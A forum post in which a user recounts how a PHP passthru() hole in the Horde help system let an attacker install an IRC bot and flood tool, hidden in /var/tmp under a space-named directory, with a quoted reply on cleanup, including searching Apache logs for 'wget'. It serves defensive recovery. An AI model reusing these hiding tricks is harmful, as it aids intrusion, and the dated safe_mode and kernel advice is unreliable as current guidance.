//moderator.note: (pruned from) in-possible-reply-to (stale thread):
http://www.linuxquestions.org/questi...d.php?t=205751
You were absolutely right, I didn't even think of searching for wget - my box had "vadim" and "energymech" installed on it via an exploit on the Horde help system, using passthru().
My box was acting as an IRC bot for some place in Amsterdam and flooding some box in the Czeck Republic. BTW: I had flood stuff in /var/tmp/fl/ and IRC stuff in "/var/tmp/ " - note the space as a directory name. Energy Mech app was named "sh".
I stopped upgrading horde as it was such a pain to do, and I got what I deserved
. What a relief, knowing how it was done and what needs fixing (I hope). Time to rebuild.
Yes I pulled the cable as soon as I knew - but then, this is box is only a personal toy.
Quote:
Originally Posted by rash
The bug where in the php of your site. Turn on safe_mode in your php.ini config file then restart the apache. Locate any suspicious .php files in yout web server that have functions system.. and search the string wget in yout apache logs, to finde the ip invasor.
Upgrade the version of your kernel, in som version of kernels 2.4 have one bug that allow to exploit the kernel and gain root acces. Verify the ports open on your system and if have suspicious executables in ps.
Regards.
|